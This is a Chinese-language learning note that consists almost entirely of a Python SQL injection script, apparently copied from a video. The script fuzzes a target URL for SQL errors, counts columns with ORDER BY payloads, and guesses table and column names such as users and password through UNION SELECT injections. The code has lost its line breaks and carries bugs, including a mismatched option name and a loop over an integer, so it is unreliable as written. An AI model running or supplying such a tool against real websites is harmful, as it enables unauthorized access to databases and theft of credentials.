【学习记录】编写初级SQL注入爆破脚本

#学习于某视频import mathimport optparseimport threading,requests
parser = optparse.OptionParser()
parser.usage = "sqlbp.py -u url -i inject_fuzz.txt"
parser.add_option("-u","--url",dest="url",help="url to test sql",action="store",type="string",metavar="URL")parser.add_option("-i","--inject",dest="inject",help="fuzz filename",action="store",type="string",metavar="INJECT")
(options,args) = parser.parse_args()
url = options.urlfuzz_file = options.inject_file
def get_urls():    urls = []    with open(fuzz_file, 'r') as f:        payload_list = f.readlines()        for payload in payload_list:            payload = payload.strip()            urls.append(url.replace("FUZZ",payload))
    return urls
inject_urls = get_urls()
result_list = [] #存储验证sql注入成功的url
is_injectable = []def test_sql():    for item in inject_urls:        r = requests.get(url=item)        result = r.text        if result.find("SQL syntax")  != -1: #存在sql注入            is_injectable.append(True)            result_list.append(r.url)
test_sql()if len(result_list) == 0:    print("no sql inject")else:    print("exist sql inject")    for item in result_list:        print(item)
#功能实现：发现注入点对应的数据表  拥有的字段数 列数#1.order by + 1 -> 2 ->3 ->4#2.出现Unknow 关键字 表面当前的字段不存在 那么4-1 -》 字段数
def detect_columns_num():    i = 0    while i < 100:        i = i+1        temp_url = url.replace("FUZZ","1'+order+by"+str(i)+"--+")        r = requests.get(temp_url)        if r.text.find("Unknow") == -1:            continue        else:            break    return i-1
if len(is_injectable)>0:    column=detect_columns_num()    print("Find this table has"+str(column)+"colum")
#-1'+union+select+1,2,3+from+users+---+ -> 根据order by

table_result = []def detect_table_name():    u = ""    for i in column:        u = u +str(i) + ","    u = u[0:len(u)-1]    table_list = ["admin","admin123","root","administrator","users","emails","referers"]    key = "doesn't exist"    for table_name in table_list:        temp_url = url.replace("FUZZ","-1'+union+select+"+u+"+from+"+ table_name + "+--+")        r = requests.get(temp_url)        if r.text.find(key) ==-1:  #没有找到            table_result.append(table_name)
if len(is_injectable) > 0:    detect_table_name()    print("Find these table_name in DB")    for table in table_result:        print(table)
column_result = []#-1' + union+select+1,2,3,+from+表名+--+def detect_column_name():    key = "Unknown column"    u = ""    for i in range(column):        u = u +str(i+1) + ","    u = u[0:len(u)-1]    #列明列表为例    column_content = ["id","user","username","password","users"]    for table in table_result:        for line in column_content:            temp_url = url.replace("FUZZ","-1'+union+select+"+u.replace("1",line)+"+from+"+ table + "+--+")            r = requests.get(temp_url)            if r.text.find(key) == -1: #表示没有找到                column_result.append(line)  #出现问题 到底是哪一个表当中具有对应的字段
            else:                column_result.append(table)if len(is_injectable) >0:    print("Find these column name")    for line  in column_result:        if line not in table_result:            print(line)        else:            print("上边的内容就是该表对应的字段名："+ line)